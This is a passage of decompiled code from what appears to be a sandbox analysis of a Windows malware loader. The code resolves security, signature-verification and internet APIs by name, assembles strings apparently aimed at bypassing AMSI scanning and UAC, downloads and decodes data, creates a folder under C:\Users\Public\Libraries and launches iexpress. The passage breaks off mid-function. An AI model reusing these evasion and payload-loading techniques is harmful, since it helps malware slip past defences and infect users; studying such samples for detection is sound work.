					E025236CC(_v280, _t3210, _t3406, _t4138);
					E02514A98( &_v284, "SaferSetLevelInformation");
					_push(_v284);
					E02514A98( &_v288, "advapi32");
					_pop(_t3409);
					E025236CC(_v288, _t3210, _t3409, _t4138);
					E02514A98( &_v292, "ReportEventW");
					_push(_v292);
					E02514A98( &_v296, "advapi32");
					_pop(_t3412);
					E025236CC(_v296, _t3210, _t3412, _t4138);
					E02514A98( &_v300, "ReportEventA");
					_push(_v300);
					E02514A98( &_v304, "advapi32");
					_pop(_t3415);
					E025236CC(_v304, _t3210, _t3415, _t4138);
					E02514A98( &_v308, "ReadEventLogW");
					_push(_v308);
					E02514A98( &_v312, "advapi32");
					_pop(_t3418);
					E025236CC(_v312, _t3210, _t3418, _t4138);
					E02514A98( &_v316, "ReadEventLogA");
					_push(_v316);
					E02514A98( &_v320, "advapi32");
					_pop(_t3421);
					E025236CC(_v320, _t3210, _t3421, _t4138);
					E02514A98( &_v324, "OpenEventLogW");
					_push(_v324);
					E02514A98( &_v328, "advapi32");
					_pop(_t3424);
					E025236CC(_v328, _t3210, _t3424, _t4138);
					E02514A98( &_v332, "OpenEventLogA");
					_push(_v332);
					E02514A98( &_v336, "advapi32");
					_pop(_t3427);
					E025236CC(_v336, _t3210, _t3427, _t4138);
					E02514A98( &_v340, "SaferRecordEventLogEntry");
					_push(_v340);
					E02514A98( &_v344, "advapi32");
					_pop(_t3430);
					E025236CC(_v344, _t3210, _t3430, _t4138);
					E02514A98( &_v348, "GetEventLogInformation");
					_push(_v348);
					E02514A98( &_v352, "advapi32");
					_pop(_t3433);
					E025236CC(_v352, _t3210, _t3433, _t4138);
					E02514A98( &_v356, "ElfReadEventLogW");
					_push(_v356);
					E02514A98( &_v360, "advapi32");
					_pop(_t3436);
					E025236CC(_v360, _t3210, _t3436, _t4138);
					E02514A98( &_v364, "ElfReadEventLogA");
					_push(_v364);
					E02514A98( &_v368, "advapi32");
					_pop(_t3439);
					E025236CC(_v368, _t3210, _t3439, _t4138);
					E02514A98( &_v372, "ElfOpenEventLogW");
					_push(_v372);
					E02514A98( &_v376, "advapi32");
					_pop(_t3442);
					E025236CC(_v376, _t3210, _t3442, _t4138);
					E02514A98( &_v380, "ElfOpenEventLogA");
					_push(_v380);
					E02514A98( &_v384, "advapi32");
					_pop(_t3445);
					E025236CC(_v384, _t3210, _t3445, _t4138);
					E02514A98( &_v388, "BuildSecurityDescriptorA");
					_push(_v388);
					E02514A98( &_v392, "advapi32");
					_pop(_t3448);
					E025236CC(_v392, _t3210, _t3448, _t4138);
					E02514A98( &_v396, "BuildImpersonateTrusteeW");
					_push(_v396);
					E02514A98( &_v400, "advapi32");
					_pop(_t3451);
					E025236CC(_v400, _t3210, _t3451, _t4138);
					E02514A98( &_v404, "BuildSecurityDescriptorW");
					_push(_v404);
					E02514A98( &_v408, "advapi32");
					_pop(_t3454);
					E025236CC(_v408, _t3210, _t3454, _t4138);
					E02514A98( &_v412, "AccessCheckByType");
					_push(_v412);
					E02514A98( &_v416, "advapi32");
					_pop(_t3457);
					E025236CC(_v416, _t3210, _t3457, _t4138);
					E02514A98( &_v420, "CryptSIPCreateIndirectData");
					_push(_v420);
					E02514A98( &_v424, "mssip32");
					_pop(_t3460); // executed
					E025236CC(_v424, _t3210, _t3460, _t4138); // executed
					E02514A98( &_v428, "CryptSIPGetInfo");
					_push(_v428);
					E02514A98( &_v432, "mssip32");
					_pop(_t3463); // executed
					E025236CC(_v432, _t3210, _t3463, _t4138); // executed
					E02514A98( &_v436, "CryptSIPGetSignedDataMsg");
					_push(_v436);
					E02514A98( &_v440, "mssip32");
					_pop(_t3466); // executed
					E025236CC(_v440, _t3210, _t3466, _t4138); // executed
					E02514A98( &_v444, "CryptSIPVerifyIndirectData");
					_push(_v444);
					E02514A98( &_v448, "mssip32");
					_pop(_t3469); // executed
					E025236CC(_v448, _t3210, _t3469, _t4138); // executed
					E02514A98( &_v452, "DllGetClassObject");
					_push(_v452);
					E02514A98( &_v456, "wuapi");
					_pop(_t3472); // executed
					E025236CC(_v456, _t3210, _t3472, _t4138); // executed
					E02514A98( &_v460, "SoftpubDefCertInit");
					_push(_v460);
					E02514A98( &_v464, "softpub");
					_pop(_t3475); // executed
					E025236CC(_v464, _t3210, _t3475, _t4138); // executed
					E02514A98( &_v468, "FindCertsByIssuer");
					_push(_v468);
					E02514A98( &_v472, "softpub");
					_pop(_t3478); // executed
					E025236CC(_v472, _t3210, _t3478, _t4138); // executed
					E02514A98( &_v476, "SoftpubCheckCert");
					_push(_v476);
					E02514A98( &_v480, "softpub");
					_pop(_t3481); // executed
					E025236CC(_v480, _t3210, _t3481, _t4138); // executed
					E02514A98( &_v484, "SoftpubInitialize");
					_push(_v484);
					E02514A98( &_v488, "softpub");
					_pop(_t3484); // executed
					E025236CC(_v488, _t3210, _t3484, _t4138); // executed
					_t1499 = E0251304C(0x208);
					_t4144 = _t1499;
					if(_t1499 != 0) {
						E025148F4(0x256dcd8, 0x252ad50);
					} else {
						E025148F4(0x256dcd8, "5E5CDDEE");
					}
					_push(0x252ad5c);
					_push( *0x256dcd8);
					_push("Initialize");
					E02514C24();
					E02514A98( &_v492, E02514D64(_v496));
					_push(_v492);
					_t3221 =  *0x256dcd8; // 0x2a51b38
					E02514BB0( &_v504, _t3221, 0x252ad5c);
					E02514A98( &_v500, E02514D64(_v504));
					_pop(_t3490); // executed
					E025236CC(_v500, _t3210, _t3490, _t4138); // executed
					_push(0x252ad5c);
					_push( *0x256dcd8);
					_push("OpenSession");
					E02514C24();
					E02514A98( &_v508, E02514D64(_v512));
					_push(_v508);
					_t3222 =  *0x256dcd8; // 0x2a51b38
					E02514BB0( &_v520, _t3222, 0x252ad5c);
					E02514A98( &_v516, E02514D64(_v520));
					_pop(_t3495); // executed
					E025236CC(_v516, _t3210, _t3495, _t4138); // executed
					_push(0x252ad5c);
					_push( *0x256dcd8);
					_push("ScanString");
					E02514C24();
					E02514A98( &_v524, E02514D64(_v528));
					_push(_v524);
					_t3223 =  *0x256dcd8; // 0x2a51b38
					E02514BB0( &_v536, _t3223, 0x252ad5c);
					E02514A98( &_v532, E02514D64(_v536));
					_pop(_t3500); // executed
					E025236CC(_v532, _t3210, _t3500, _t4138); // executed
					_push(0x252ad5c);
					_push( *0x256dcd8);
					_push("ScanBuffer");
					E02514C24();
					E02514A98( &_v540, E02514D64(_v544));
					_push(_v540);
					_t3224 =  *0x256dcd8; // 0x2a51b38
					E02514BB0( &_v552, _t3224, 0x252ad5c);
					E02514A98( &_v548, E02514D64(_v552));
					_pop(_t3505); // executed
					E025236CC(_v548, _t3210, _t3505, _t4138); // executed
					E02512FC4(E02517DA0(0x252adb8, _t4144),  &_v560);
					E025181E0(_v560,  &_v556);
					E025148F4(0x256d8f4, _v556);
					_t1565 =  *0x256d8f4; // 0x7f470018
					_v564 = _t1565;
					_t3211 = _v564;
					if(_t3211 != 0) {
						_t3211 =  *((intOrPtr*)(_t3211 - 4));
					}
					_t1566 =  *0x256d8f4; // 0x7f470018
					E02514DC4(_t1566, _t3211 - 4, 1, 0x256d8e0);
					_push(0x252ad5c);
					_push( *0x256dcd8);
					_push("ScanBuffer");
					E02514C24();
					E02514A98( &_v568, E02514D64(_v572));
					_push(_v568);
					_t3227 =  *0x256dcd8; // 0x2a51b38
					E02514BB0( &_v580, _t3227, 0x252ad5c);
					E02514A98( &_v576, E02514D64(_v580));
					_pop(_t3514); // executed
					E025236CC(_v576, _t3211, _t3514, _t4138);
					_t1582 =  *0x256d8e0; // 0x2a2da38
					_t1583 = E02518110(_t1582);
					_t4147 = _t1583;
					if(_t1583 == 0) {
						_push(0x252ad5c);
						_push( *0x256dcd8);
						_push("OpenSession");
						E02514C24();
						E02514A98( &_v600, E02514D64(_v604));
						_push(_v600);
						_t3228 =  *0x256dcd8; // 0x2a51b38
						E02514BB0( &_v612, _t3228, 0x252ad5c);
						E02514A98( &_v608, E02514D64(_v612));
						_pop(_t3519); // executed
						E025236CC(_v608, _t3211, _t3519, _t4138); // executed
						_push(0x252ad5c);
						_push( *0x256dcd8);
						_push("ScanBuffer");
						E02514C24();
						E02514A98( &_v616, E02514D64(_v620));
						_push(_v616);
						_t3229 =  *0x256dcd8; // 0x2a51b38
						E02514BB0( &_v628, _t3229, 0x252ad5c);
						E02514A98( &_v624, E02514D64(_v628));
						_pop(_t3524); // executed
						E025236CC(_v624, _t3211, _t3524, _t4138); // executed
						E02512FC4(E02517DA0(0x252adb8, __eflags),  &_v632);
						E02513300(0x256d8f8, _v632, __eflags, _t4158);
						_t1617 =  *0x2569d7c; // 0x252d00c
						 *_t1617 = 0;
						E02512D28(E025136BC());
						E02514F90(0x256da8c, E02512D28(E025134CC(0x256d8f8)));
						_t1626 =  *0x256da8c; // 0x7fae0018
						_v564 = _t1626;
						_t3212 = _v564;
						__eflags = _t3212;
						if(_t3212 != 0) {
							_t3215 = _t3212 - 4;
							__eflags = _t3215;
							_t3212 =  *_t3215;
						}
						E02514DBC(0x256da8c);
						_t1630 = E02513454(0); // executed
						E02512D28(_t1630);
						E02512D28(E02513474(0x256d8f8));
						_t1635 =  *0x256da8c; // 0x7fae0018, executed
						E02525300(_t1635, _t3212,  &_v636, 0x252adc4, _t4137, _t4138); // executed
						_t3232 =  *0x25251f8; // 0x25251fc
						E02515A4C(0x256da94, _t3232, _v636);
						_t3532 =  *0x256da94; // 0x7f290018
						E025148F4(0x256da44,  *((intOrPtr*)(_t3532 + 4)));
						_t1642 = E02517DA0(0x252add4, __eflags);
						_t1643 =  *0x256da44; // 0x2a0ec18
						E02525B34(_t1643, _t3212,  &_v640, _t1642, _t4138);
						E025148F4(0x256dcdc, _v640);
						_t1647 =  *0x256dcdc; // 0x2a078e8
						__eflags = E0252521C(_t1647) - 1;
						if(__eflags == 0) {
							_t3149 =  *0x256dcdc; // 0x2a078e8, executed
							E02525974(_t3149, _t3212,  &_v640,  &_v644, _t4138, __eflags); // executed
							E025148F4(0x256da88, _v644);
							Sleep(0x1f4); // executed
							E02514A98( &_v648, "InternetOpenW");
							_push(_v648);
							E02514A98( &_v652, "wininet");
							_pop(_t4120); // executed
							E025236CC(_v652, _t3212, _t4120, _t4138); // executed
							E02514A98( &_v656, "InternetOpenUrlA");
							_push(_v656);
							E02514A98( &_v660, "wininet");
							_pop(_t4123);
							E025236CC(_v660, _t3212, _t4123, _t4138);
							E02514A98( &_v664, "InternetReadFile");
							_push(_v664);
							E02514A98( &_v668, "wininet");
							_pop(_t4126);
							E025236CC(_v668, _t3212, _t4126, _t4138);
						}
						_t1649 =  *0x256da88; // 0x7f570018, executed
						_t1650 = E025258B0(_t1649, _t3212, __eflags); // executed
						__eflags = _t1650 - 1;
						if(_t1650 == 1) {
							_t3110 =  *0x256da8c; // 0x7fae0018
							E02525300(_t3110, _t3212,  &_v672, 0x252ae20, _t4137, _t4138);
							_t3318 =  *0x25251f8; // 0x25251fc
							E02515A4C(0x256da94, _t3318, _v672);
							_t4101 =  *0x256da94; // 0x7f290018
							E025148F4(0x256da44,  *((intOrPtr*)(_t4101 + 4)));
							_t3117 = E02517DA0(0x252add4, __eflags);
							_t3118 =  *0x256da44; // 0x2a0ec18
							E02525B34(_t3118, _t3212,  &_v676, _t3117, _t4138);
							E025148F4(0x256dcdc, _v676);
							_t3122 =  *0x256dcdc; // 0x2a078e8
							__eflags = E0252521C(_t3122) - 1;
							if(__eflags == 0) {
								_t3145 =  *0x256dcdc; // 0x2a078e8
								E02525974(_t3145, _t3212,  &_v676,  &_v680, _t4138, __eflags);
								E025148F4(0x256da88, _v680);
							}
							Sleep(0x1f4);
							E02514A98( &_v684, "InternetOpenW");
							_push(_v684);
							E02514A98( &_v688, "wininet");
							_pop(_t4107);
							E025236CC(_v688, _t3212, _t4107, _t4138);
							E02514A98( &_v692, "InternetOpenUrlA");
							_push(_v692);
							E02514A98( &_v696, "wininet");
							_pop(_t4110);
							E025236CC(_v696, _t3212, _t4110, _t4138);
							E02514A98( &_v700, "InternetReadFile");
							_push(_v700);
							E02514A98( &_v704, "wininet");
							_pop(_t4113);
							E025236CC(_v704, _t3212, _t4113, _t4138);
						}
					} else {
						_push(0x252ad5c);
						_push( *0x256dcd8);
						_push("OpenSession");
						E02514C24();
						E02514A98( &_v584, E02514D64(_v588));
						_push(_v584);
						_t3320 =  *0x256dcd8; // 0x2a51b38
						E02514BB0( &_v596, _t3320, 0x252ad5c);
						E02514A98( &_v592, E02514D64(_v596));
						_pop(_t4131);
						E025236CC(_v592, _t3211, _t4131, _t4138);
						_t4132 =  *0x256d8e0; // 0x2a2da38
						E02513300(0x256d8f8, _t4132, _t4147, _t4158);
						_t3190 =  *0x2569d7c; // 0x252d00c
						 *_t3190 = 0;
						E02512D28(E025136BC());
						E02514F90(0x256da88, E02512D28(E025134CC(0x256d8f8)));
						_t3199 =  *0x256da88; // 0x7f570018
						_v564 = _t3199;
						_t3212 = _v564;
						if(_t3212 != 0) {
							_t3216 = _t3212 - 4;
							_t4149 = _t3216;
							_t3212 =  *_t3216;
						}
						E02514DBC(0x256da88);
						E02512D28(E02513454(0));
						E02512D28(E02513474(0x256d8f8));
					}
					_push(0x252ad5c);
					_push( *0x256dcd8);
					_push("Initialize");
					E02514C24();
					E02514A98( &_v708, E02514D64(_v712));
					_push(_v708);
					_t3234 =  *0x256dcd8; // 0x2a51b38
					E02514BB0( &_v720, _t3234, 0x252ad5c);
					E02514A98( &_v716, E02514D64(_v720));
					_pop(_t3540); // executed
					E025236CC(_v716, _t3212, _t3540, _t4138); // executed
					_push(0x252ad5c);
					_push( *0x256dcd8);
					_push("OpenSession");
					E02514C24();
					E02514A98( &_v724, E02514D64(_v728));
					_push(_v724);
					_t3235 =  *0x256dcd8; // 0x2a51b38
					E02514BB0( &_v736, _t3235, 0x252ad5c);
					E02514A98( &_v732, E02514D64(_v736));
					_pop(_t3545); // executed
					E025236CC(_v732, _t3212, _t3545, _t4138); // executed
					_push(0x252ad5c);
					_push( *0x256dcd8);
					_push("ScanString");
					E02514C24();
					E02514A98( &_v740, E02514D64(_v744));
					_push(_v740);
					_t3236 =  *0x256dcd8; // 0x2a51b38
					E02514BB0( &_v752, _t3236, 0x252ad5c);
					E02514A98( &_v748, E02514D64(_v752));
					_pop(_t3550); // executed
					E025236CC(_v748, _t3212, _t3550, _t4138); // executed
					E025148F4(0x256da50, 0x252add4);
					_push(0x252ad5c);
					_push( *0x256dcd8);
					_push("ScanBuffer");
					E02514C24();
					E02514A98( &_v756, E02514D64(_v760));
					_push(_v756);
					_t3237 =  *0x256dcd8; // 0x2a51b38
					E02514BB0( &_v768, _t3237, 0x252ad5c);
					E02514A98( &_v764, E02514D64(_v768));
					_pop(_t3556); // executed
					E025236CC(_v764, _t3212, _t3556, _t4138);
					_t1709 =  *0x256da88; // 0x7f570018, executed
					_t1710 = E025258B0(_t1709, _t3212, _t4149); // executed
					_t4150 = (_t1710 ^ 0x00000001) - 1;
					if((_t1710 ^ 0x00000001) != 1) {
						goto L51;
					} else {
						_t1712 =  *0x256da50; // 0x2a51b48
						_t1713 = E02517DA0(_t1712, _t4150);
						_t1714 =  *0x256da88; // 0x7f570018
						E02525BDC(_t1714, _t3212,  &_v772, _t1713, _t4137, _t4138);
						E025148F4(0x256d8f4, _v772);
						_t1718 =  *0x256d8f4; // 0x7f470018
						E02525AC0(_t1718, _t3212,  &_v772,  &_v776, _t4137, _t4138);
						E025148F4(0x256d8f4, _v776);
						_push(0x252ad5c);
						_push( *0x256dcd8);
						_push("ScanString");
						E02514C24();
						E02514A98( &_v780, E02514D64(_v784));
						_push(_v780);
						_t3239 =  *0x256dcd8; // 0x2a51b38
						E02514BB0( &_v792, _t3239, 0x252ad5c);
						E02514A98( &_v788, E02514D64(_v792));
						_pop(_t3565); // executed
						E025236CC(_v788, _t3212, _t3565, _t4138); // executed
						_t3566 =  *0x252dffc; // 0x54ed44
						E02514B28( &_v800, _t3566);
						_t1738 =  *0x256d8f4; // 0x7f470018, executed
						E02525300(_t1738, _t3212,  &_v796, _v800, _t4137, _t4138); // executed
						_t3241 =  *0x25251f8; // 0x25251fc
						E02515A4C(0x256da94, _t3241, _v796);
						_t3569 =  *0x256da94; // 0x7f290018
						E025148F4(0x256dd00,  *((intOrPtr*)(_t3569 + 4)));
						_t3571 =  *0x256da94; // 0x7f290018
						E025148F4(0x256dcf8,  *((intOrPtr*)(_t3571 + 8)));
						_t3573 =  *0x256da94; // 0x7f290018
						E025148F4(0x256da80,  *((intOrPtr*)(_t3573 + 0xc)));
						_t3575 =  *0x256da94; // 0x7f290018
						E025148F4(0x256dcfc,  *((intOrPtr*)(_t3575 + 0x10)));
						_t3577 =  *0x256da94; // 0x7f290018
						E025148F4(0x256dce0,  *((intOrPtr*)(_t3577 + 0x14)));
						_t3579 =  *0x256da94; // 0x7f290018
						E025148F4(0x256dce4,  *((intOrPtr*)(_t3579 + 0x18)));
						_t3581 =  *0x256da94; // 0x7f290018
						E025148F4(0x256dce8,  *((intOrPtr*)(_t3581 + 0x1c)));
						_t3583 =  *0x256da94; // 0x7f290018
						E025148F4(0x256dcec,  *((intOrPtr*)(_t3583 + 0x20)));
						_t3585 =  *0x256da94; // 0x7f290018
						E025148F4(0x256dcf0,  *((intOrPtr*)(_t3585 + 0x24)));
						_push(0x252ad5c);
						_push( *0x256dcd8);
						_push("Initialize");
						E02514C24();
						E02514A98( &_v804, E02514D64(_v808));
						_push(_v804);
						_t3242 =  *0x256dcd8; // 0x2a51b38
						E02514BB0( &_v816, _t3242, 0x252ad5c);
						E02514A98( &_v812, E02514D64(_v816));
						_pop(_t3591); // executed
						E025236CC(_v812, _t3212, _t3591, _t4138); // executed
						_push(0x252ad5c);
						_push( *0x256dcd8);
						_push("OpenSession");
						E02514C24();
						E02514A98( &_v820, E02514D64(_v824));
						_push(_v820);
						_t3243 =  *0x256dcd8; // 0x2a51b38
						E02514BB0( &_v832, _t3243, 0x252ad5c);
						E02514A98( &_v828, E02514D64(_v832));
						_pop(_t3596); // executed
						E025236CC(_v828, _t3212, _t3596, _t4138); // executed
						_push(0x252ad5c);
						_push( *0x256dcd8);
						_push("ScanString");
						E02514C24();
						E02514A98( &_v836, E02514D64(_v840));
						_push(_v836);
						_t3244 =  *0x256dcd8; // 0x2a51b38
						E02514BB0( &_v848, _t3244, 0x252ad5c);
						E02514A98( &_v844, E02514D64(_v848));
						_pop(_t3601); // executed
						E025236CC(_v844, _t3212, _t3601, _t4138); // executed
						E025148F4(0x256da90, "C:\\Users\\Public\\Libraries");
						_t1804 =  *0x256da90; // 0x2a35050
						E02514A98( &_v852, E02514D64(_t1804));
						if(E02518134(_v852) == 0) {
							_t3104 =  *0x256da90; // 0x2a35050
							E02514A98( &_v856, E02514D64(_t3104));
							E025182C8(_v856);
						}
						_t1810 =  *0x256dcf8; // 0x2a59628
						_v564 = _t1810;
						_t3213 = _v564;
						if(_t3213 != 0) {
							_t3213 =  *((intOrPtr*)(_t3213 - 4));
						}
						_t1811 =  *0x256dcf8; // 0x2a59628
						E02514DC4(_t1811, _t3213 != 3, 1, 0x256dcf8);
						_push(0x252ad5c);
						_push( *0x256dcd8);
						_push("ScanString");
						E02514C24();
						E02514A98( &_v860, E02514D64(_v864));
						_push(_v860);
						_t3247 =  *0x256dcd8; // 0x2a51b38
						E02514BB0( &_v872, _t3247, 0x252ad5c);
						E02514A98( &_v868, E02514D64(_v872));
						_pop(_t3609); // executed
						E025236CC(_v868, _t3213, _t3609, _t4138);
						_t1827 =  *0x256dce0; // 0x2a51b98
						E02514CB0(_t1827, 0x252ae54);
						if(_t3213 != 3) {
							L31:
							_push(0x252ad5c);
							_push( *0x256dcd8);
							_push("Initialize");
							E02514C24();
							E02514A98( &_v1076, E02514D64(_v1080));
							_push(_v1076);
							_t3248 =  *0x256dcd8; // 0x2a51b38
							E02514BB0( &_v1088, _t3248, 0x252ad5c);
							E02514A98( &_v1084, E02514D64(_v1088));
							_pop(_t3615); // executed
							E025236CC(_v1084, _t3213, _t3615, _t4138); // executed
							_push(0x252ad5c);
							_push( *0x256dcd8);
							_push("OpenSession");
							E02514C24();
							E02514A98( &_v1092, E02514D64(_v1096));
							_push(_v1092);
							_t3249 =  *0x256dcd8; // 0x2a51b38
							E02514BB0( &_v1104, _t3249, 0x252ad5c);
							E02514A98( &_v1100, E02514D64(_v1104));
							_pop(_t3620); // executed
							E025236CC(_v1100, _t3213, _t3620, _t4138); // executed
							_push(0x252ad5c);
							_push( *0x256dcd8);
							_push("ScanString");
							E02514C24();
							E02514A98( &_v1108, E02514D64(_v1112));
							_push(_v1108);
							_t3250 =  *0x256dcd8; // 0x2a51b38
							E02514BB0( &_v1120, _t3250, 0x252ad5c);
							E02514A98( &_v1116, E02514D64(_v1120));
							_pop(_t3625); // executed
							E025236CC(_v1116, _t3213, _t3625, _t4138);
							_t1871 =  *0x256dcfc; // 0x0
							E02514CB0(_t1871, 0x252ae54);
							if(__eflags != 0) {
								L38:
								_push(0x252ad5c);
								_push( *0x256dcd8);
								_push("Initialize");
								E02514C24();
								E02514A98( &_v1704, E02514D64(_v1708));
								_push(_v1704);
								_t3251 =  *0x256dcd8; // 0x2a51b38
								E02514BB0( &_v1716, _t3251, 0x252ad5c);
								E02514A98( &_v1712, E02514D64(_v1716));
								_pop(_t3631); // executed
								E025236CC(_v1712, _t3213, _t3631, _t4138); // executed
								_push(0x252ad5c);
								_push( *0x256dcd8);
								_push("OpenSession");
								E02514C24();
								E02514A98( &_v1720, E02514D64(_v1724));
								_push(_v1720);
								_t3252 =  *0x256dcd8; // 0x2a51b38
								E02514BB0( &_v1732, _t3252, 0x252ad5c);
								E02514A98( &_v1728, E02514D64(_v1732));
								_pop(_t3636); // executed
								E025236CC(_v1728, _t3213, _t3636, _t4138); // executed
								_push(0x252ad5c);
								_push( *0x256dcd8);
								_push("ScanString");
								E02514C24();
								E02514A98( &_v1736, E02514D64(_v1740));
								_push(_v1736);
								_t3253 =  *0x256dcd8; // 0x2a51b38
								E02514BB0( &_v1748, _t3253, 0x252ad5c);
								E02514A98( &_v1744, E02514D64(_v1748));
								_pop(_t3641); // executed
								E025236CC(_v1744, _t3213, _t3641, _t4138); // executed
								_t3642 =  *0x256dd00; // 0x2a1f418
								_t1915 =  *0x256da80; // 0x7f190018, executed
								E02525580(_t1915, _t3213,  &_v1752, _t3642, _t4137, _t4138); // executed
								E025148F4(0x256da48, _v1752);
								_t1919 =  *0x256dcf0; // 0x2a51bb8
								_t1920 = E02517DA0(_t1919, __eflags);
								_t1921 =  *0x256da48; // 0x7f210018
								E02525B34(_t1921, _t3213,  &_v1756, _t1920, _t4138);
								E025148F4(0x256da4c, _v1756);
								_t1925 =  *0x256da4c; // 0x7f110018
								E02525AC0(_t1925, _t3213,  &_v1756,  &_v1764, _t4137, _t4138);
								E02525910(_v1764,  &_v1756,  &_v1760);
								E025148F4(0x256da84, _v1760);
								_push(0x252ad5c);
								_push( *0x256dcd8);
								_push("Initialize");
								E02514C24();
								E02514A98( &_v1768, E02514D64(_v1772));
								_push(_v1768);
								_t3256 =  *0x256dcd8; // 0x2a51b38
								E02514BB0( &_v1780, _t3256, 0x252ad5c);
								E02514A98( &_v1776, E02514D64(_v1780));
								_pop(_t3653); // executed
								E025236CC(_v1776, _t3213, _t3653, _t4138); // executed
								_push(0x252ad5c);
								_push( *0x256dcd8);
								_push("OpenSession");
								E02514C24();
								E02514A98( &_v1784, E02514D64(_v1788));
								_push(_v1784);
								_t3257 =  *0x256dcd8; // 0x2a51b38
								E02514BB0( &_v1796, _t3257, 0x252ad5c);
								E02514A98( &_v1792, E02514D64(_v1796));
								_pop(_t3658); // executed
								E025236CC(_v1792, _t3213, _t3658, _t4138); // executed
								_push(0x252ad5c);
								_push( *0x256dcd8);
								_push("UacScan");
								E02514C24();
								E02514A98( &_v1800, E02514D64(_v1804));
								_push(_v1800);
								_t3258 =  *0x256dcd8; // 0x2a51b38
								E02514BB0( &_v1812, _t3258, 0x252ad5c);
								E02514A98( &_v1808, E02514D64(_v1812));
								_pop(_t3663); // executed
								E025236CC(_v1808, _t3213, _t3663, _t4138); // executed
								_push(0x252ad5c);
								_push( *0x256dcd8);
								_push("UacInitialize");
								E02514C24();
								E02514A98( &_v1816, E02514D64(_v1820));
								_push(_v1816);
								_t3259 =  *0x256dcd8; // 0x2a51b38
								E02514BB0( &_v1828, _t3259, 0x252ad5c);
								E02514A98( &_v1824, E02514D64(_v1828));
								_pop(_t3668); // executed
								E025236CC(_v1824, _t3213, _t3668, _t4138); // executed
								_push(0x252ad5c);
								_push( *0x256dcd8);
								_push("ScanString");
								E02514C24();
								E02514A98( &_v1832, E02514D64(_v1836));
								_push(_v1832);
								_t3260 =  *0x256dcd8; // 0x2a51b38
								E02514BB0( &_v1844, _t3260, 0x252ad5c);
								E02514A98( &_v1840, E02514D64(_v1844));
								_pop(_t3673); // executed
								E025236CC(_v1840, _t3213, _t3673, _t4138);
								_t2001 =  *0x256dcec; // 0x0
								E02514CB0(_t2001, 0x252ae54);
								if(__eflags == 0) {
									_t2662 =  *0x256dce4; // 0x2a51b88
									E02514CB0(_t2662, 0x252ae54);
									if(__eflags != 0) {
										_t2664 =  *0x256dce8; // 0x0
										E02514CB0(_t2664, 0x252ae54);
										if(__eflags != 0) {
											_push(0x252ad5c);
											_push( *0x256dcd8);
											_push("ScanBuffer");
											E02514C24();
											E02514A98( &_v1848, E02514D64(_v1852));
											_push(_v1848);
											_t3280 =  *0x256dcd8; // 0x2a51b38
											E02514BB0( &_v1860, _t3280, 0x252ad5c);
											E02514A98( &_v1856, E02514D64(_v1860));
											_pop(_t3941);
											E025236CC(_v1856, _t3213, _t3941, _t4138);
											_push(0x252ad5c);
											_push( *0x256dcd8);
											_push("OpenSession");
											E02514C24();
											E02514A98( &_v1864, E02514D64(_v1868));
											_push(_v1864);
											_t3281 =  *0x256dcd8; // 0x2a51b38
											E02514BB0( &_v1876, _t3281, 0x252ad5c);
											E02514A98( &_v1872, E02514D64(_v1876));
											_pop(_t3946);
											E025236CC(_v1872, _t3213, _t3946, _t4138);
											_push(0x252ad5c);
											_push( *0x256dcd8);
											_push(0x252b020);
											_push(0);
											_push(0x252b02c);
											_push(0);
											_push(0x252b038);
											_push(0);
											_push(0x252b044);
											E02514C24();
											E02514A98( &_v1880, E02514D64(_v1884));
											_push(_v1880);
											_t3282 =  *0x256dcd8; // 0x2a51b38
											E02514BB0( &_v1892, _t3282, 0x252ad5c);
											E02514A98( &_v1888, E02514D64(_v1892));
											_pop(_t3951);
											E025236CC(_v1888, _t3213, _t3951, _t4138);
											E02514A98( &_v1896, "ReportEventA");
											_push(_v1896);
											E02514A98( &_v1900, "advapi32");
											_pop(_t3954);
											E025236CC(_v1900, _t3213, _t3954, _t4138);
											_push(0x252ad5c);
											_push( *0x256dcd8);
											_push("OpenSession");
											E02514C24();
											E02514A98( &_v1904, E02514D64(_v1908));
											_push(_v1904);
											_t3283 =  *0x256dcd8; // 0x2a51b38
											E02514BB0( &_v1916, _t3283, 0x252ad5c);
											E02514A98( &_v1912, E02514D64(_v1916));
											_pop(_t3959);
											E025236CC(_v1912, _t3213, _t3959, _t4138);
											E02514A98( &_v1920, "SystemFunction035");
											_push(_v1920);
											E02514A98( &_v1924, "advapi32");
											_pop(_t3962);
											E025236CC(_v1924, _t3213, _t3962, _t4138);
											_push(0x252ad5c);
											_push( *0x256dcd8);
											_push("OpenSession");
											E02514C24();
											E02514A98( &_v1928, E02514D64(_v1932));
											_push(_v1928);
											_t3284 =  *0x256dcd8; // 0x2a51b38
											E02514BB0( &_v1940, _t3284, 0x252ad5c);
											E02514A98( &_v1936, E02514D64(_v1940));
											_pop(_t3967);
											E025236CC(_v1936, _t3213, _t3967, _t4138);
											E02514A98( &_v1944, "ReportEventW");
											_push(_v1944);
											E02514A98( &_v1948, "advapi32");
											_pop(_t3970);
											E025236CC(_v1948, _t3213, _t3970, _t4138);
											E02524F34(E02514DBC(0x256da84), _t3213, _t3284, _t4137, _t4138, _t4158);
										}
									}
								}
								_push(0x252ad5c);
								_push( *0x256dcd8);
								_push("ScanString");
								E02514C24();
								E02514A98( &_v1952, E02514D64(_v1956));
								_push(_v1952);
								_t3261 =  *0x256dcd8; // 0x2a51b38
								E02514BB0( &_v1964, _t3261, 0x252ad5c);
								E02514A98( &_v1960, E02514D64(_v1964));
								_pop(_t3679); // executed
								E025236CC(_v1960, _t3213, _t3679, _t4138);
								_t2017 =  *0x256dce8; // 0x0
								E02514CB0(_t2017, 0x252ae54);
								if(__eflags == 0) {
									_t2529 =  *0x256dce4; // 0x2a51b88
									E02514CB0(_t2529, 0x252ae54);
									if(__eflags != 0) {
										_t2531 =  *0x256dcec; // 0x0
										E02514CB0(_t2531, 0x252ae54);
										if(__eflags != 0) {
											_push(0x252ad5c);
											_push( *0x256dcd8);
											_push("ScanBuffer");
											E02514C24();
											E02514A98( &_v1968, E02514D64(_v1972));
											_push(_v1968);
											_t3273 =  *0x256dcd8; // 0x2a51b38
											E02514BB0( &_v1980, _t3273, 0x252ad5c);
											E02514A98( &_v1976, E02514D64(_v1980));
											_pop(_t3894);
											E025236CC(_v1976, _t3213, _t3894, _t4138);
											_push(0x252ad5c);
											_push( *0x256dcd8);
											_push("OpenSession");
											E02514C24();
											E02514A98( &_v1984, E02514D64(_v1988));
											_push(_v1984);
											_t3274 =  *0x256dcd8; // 0x2a51b38
											E02514BB0( &_v1996, _t3274, 0x252ad5c);
											E02514A98( &_v1992, E02514D64(_v1996));
											_pop(_t3899);
											E025236CC(_v1992, _t3213, _t3899, _t4138);
											WinExec("iexpress", 0);
											 *0x256da9c = E025245F8("iexpress.exe");
